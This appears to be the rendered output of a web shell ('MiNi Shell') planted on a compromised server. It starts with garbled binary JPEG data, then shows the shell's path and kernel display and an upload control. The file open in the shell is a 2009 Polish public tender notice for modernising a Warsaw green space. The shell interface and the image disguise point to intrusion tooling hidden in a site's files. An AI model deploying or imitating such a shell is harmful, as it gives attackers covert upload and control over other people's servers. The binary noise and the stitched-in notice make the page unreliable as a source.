JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/344044-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonanie modernizacji zieleńca przy Placu Grzybowskim i terenów przyległych w zarządzie ZDM w Warszawie.</b><br>
<b>Numer ogłoszenia: 344044 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów  Publicznych , ul. Jezuicka 1/3, 00-281 Warszawa, woj. mazowieckie, tel. 022 5568322, faks 022 5568373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ztp.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie modernizacji zieleńca przy Placu Grzybowskim i terenów przyległych w zarządzie ZDM w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie modernizacji zieleńca przy Placu Grzybowskim i terenów przyległych w zarządzie ZDM w Warszawie.
Szczegółowy  zakres prac określony jest następującą dokumentacją:
1) projektem wykonawczym na wykonanie modernizacji Placu Grzybowskiego w Warszawie- zał. nr 9a do 9l do SIWZ
2) specyfikacje techniczne wykonania i odbioru robót budowlanych - modernizacji Placu Grzybowskiego w Warszawie stanowiąca załącznik nr 10a do 10k do SIWZ,
3) przedmiar robót - modernizacji Placu Grzybowskiego w Warszawie zał. nr 11a i 11b  do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 45.11.12.00-0, 45.22.35.00-1, 45.11.10.00-1, 45.23.32.20-7, 45.23.32.90-8, 45.40.00.00-1, 45.31.00.00-3, 45.23.32.23-8, 45.23.21.20-9, 45.33.12.10-1, 45.23.23.10-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości:        300 000zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1 W postępowaniu mogą wziąć udział wykonawcy, którzy:
1.1 nie podlegają wykluczeniu z przedmiotowego postępowania  na  podstawie art. 24 ust. 1  ustawy;
1.2 spełniają warunki określone w art. 22 ust. 1 pkt. 1-3 ustawy oraz spełniają warunki dodatkowe:
1.2.1 posiadają uprawnienia niezbędne do wykonywania określonej działalności lub czynności,  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2.1.1 posiadają uprawnienie do występowania jako podmiot gospodarczy w zakresie objętym niniejszym zamówieniem,
1.1.1	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia: 
1.1.1.1	udokumentują, iż w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie,  należycie wykonali zamówienia o charakterze i złożoności podobnej do przedmiotu zamówienia. Należy wskazać wykonanie: 
- co najmniej 2 zamówienia dotyczące wykonania nawierzchni z materiałów kamiennych (płyty, kostka) o powierzchni min. 5 000 m2 każde,
- co najmniej 1 zamówienie dotyczące wykonania nawierzchni betonowych (kostka, płyty) o powierzchni min. 500 m2 , 
- co najmniej 1 zamówienie dot. montażu urządzeń technologicznych dla przepompowni lub hydroforowni lub stacji uzdatniania wody lub obiegu zamkniętego fontann,
- co najmniej 1 zamówienie polegające na remoncie lub budowie sieci wodociągowej o wartości min. 70 000zł. lub przyłącza wodociągowego o wartości min. 40 000zł.
- co najmniej 1 zamówienie dotyczące budowy oświetlenia ulicznego lub parkowego polegające na montażu latarni (słupa z oprawami) wraz z  ułożeniem kabli - min 20 latarń,
- zamówienia (jedno lub kilka) dotyczące wykonania robót ogrodniczych dotyczących sadzenia drzew, posadzenia krzewów i/lub roślin okrywowych, zakładania rabat bylinowych, obejmujące posadzenie minimum 20 sztuk drzew, posadzenie minimum 4 000 sztuk krzewów i lub roślin okrywowych, zakładanie rabat bylinowych na powierzchni minimum 1 000m2.
	
Zrealizowane zamówienia należy wykazać wg załączonego wzoru nr 5a i 5b do SIWZ.

1.1.1.2. udokumentują dysponowanie kadrą techniczną - - jedną osobą pełniącą funkcję kierownika budowy posiadającą uprawnienia budowlane wykonawcze w specjalności budowlano - konstrukcyjnej i min. 5 lat doświadczenia w prowadzeniu prac budowlanych, w tym 2-letnią praktykę na budowie przy zabytkach nieruchomych tj. spełniającą warunki określone w § 8 ust. 1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 roku, który stanowi: 
Robotami budowlanymi przy zabytkach nieruchomych mogą kierować osoby, które posiadają odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych,

- jedną osobą pełniącą funkcję kierownika robót z uprawnieniami budowlanymi 
w specjalności drogowej, która odbyła co najmniej dwuletnią praktykę zawodową na budowie przy zabytkach nieruchomych zgodnie z Rozporządzeniem Ministra Kultury 
z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, 
a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z dnia 30.06.2004 r. nr 150 poz. 1579) lub posiada zaświadczenie o którym mowa 
w § 13 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych. (Dz. U. z dnia 30 czerwca 2004 r.),

- jedną osobą pełniącą funkcję kierownika robót z uprawnieniami budowlanymi 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych, 

- jedną osobą pełniącą funkcję kierownika robót ogrodniczych posiadająca tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów, obejmujących wiadomości w zakresie konserwacji parków zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej oraz odbytą po zakończeniu studiów co najmniej 12-miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju zabytków lub posiadająca zaświadczenie o którym mowa w § 13 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych. (Dz. U. z dnia 30 czerwca 2004 r.).
              Wykaz kadry technicznej należy przedstawić wg załączonego wzoru nr 6 do SIWZ.

1.1.2	  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie    zamówienia:
1.1.2.1	udokumentują osiągnięcie w okresie ostatnich trzech lat obrotowych tj. 2006, 2007, 2008, a jeśli okres prowadzenia działalności jest krótszy - za ten okres, przychodu ze sprzedaży produktów (dla wykonawców prowadzących pełną księgowość) lub przychodu z działalności (dla wykonawców niezobowiązanych do sporządzania bilansu) minimum łącznie w w/w okresie 20.000.000 złotych, według załączonego wzoru, który stanowią załączniki nr 7a i 7b do SIWZ.
1.1.3	wniosą wadium w wymaganym terminie, wysokości i formie.

Uwaga:
	Złożenie przez wykonawcę w ofercie dokumentów i oświadczeń niżej wymienionych w pkt. 2 będzie stanowiło podstawę do oceny spełnienia warunków udziału 
	w postępowaniu. Zamawiający ustali na podstawie treści tych dokumentów 
  i oświadczeń czy wykonawca spełnia wszystkie wyżej wymienione warunki, stosując 	zasadę spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2	Dokumenty wymagane w postępowaniu:
2.1	Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
2.1.1	Oświadczenie o niepodleganiu  wykluczeniu z przedmiotowego postępowania na podstawie art. 24 ust. 1  w związku z art. 22 ust. 1 pkt 4 ustawy - wg wzoru określonego w załączniku Nr 3 do SIWZ
2.1.2	Oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 pkt 1-3 ustawy -wg wzoru określonego w załączniku Nr 4 do SIWZ.
2.1.3	Dokument potwierdzający dopuszczenie wykonawcy do obrotu prawnego 
w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie  wcześniej  niż 6 miesięcy przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
2.1.4	Aktualne zaświadczenie  właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez wykonawcę).
2.1.5	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę).
2.1.6	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym 
art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w formie oryginału lub kopii poświadczonej 
za zgodność z oryginałem przez wykonawcę).
2.1.7	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 9 ustawy wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (w formie oryginału lub kopii poświadczonej 
za zgodność z oryginałem przez wykonawcę).
2.1.8	Potwierdzenie wniesienia wadium,
2.1.9	Wykaz zamówień - wg wzoru stanowiącego załącznik Nr  5a i 5b do SIWZ.
	Do wykazu należy dołączyć dokumenty potwierdzające, że zamówienia zostały 	   wykonane należycie.
2.1.10	Wykaz osób z podaniem pełnionej funkcji przy realizacji zamówienia - wg wzoru stanowiącego załącznik Nr 6 do SIWZ.
Do wykazu należy dołączyć kopie uprawnień budowlanych i zaświadczeń 
o członkostwie w Izbie Inżynierów Budownictwa poświadczonych za zgodność 
z oryginałem przez wykonawcę. 
Do wykazu należy załączyć, o ile zachodzi taka okoliczność, pisemne zobowiązanie 	innych podmiotów do udostępnienia osób wymienionych w wykazie.
2.1.11	Informacja finansowa wraz z dokumentami wymienionymi w załączniku 
(w formie oryginałów lub kopii poświadczonych za zgodność z oryginałem przez wykonawcę) potwierdzającymi dane finansowe - wg wzoru stanowiącego załącznik Nr 7a i  7b do SIWZ,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ztp.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Jezuicka 1/3, 00-281 Warszawa. Cena formularza SIWZ wynosi 600 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 10:00, miejsce: Siedziba ZTP, ul. Jezuicka 1/3, 00-281 Warszawa, III piętro, pok. 304 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com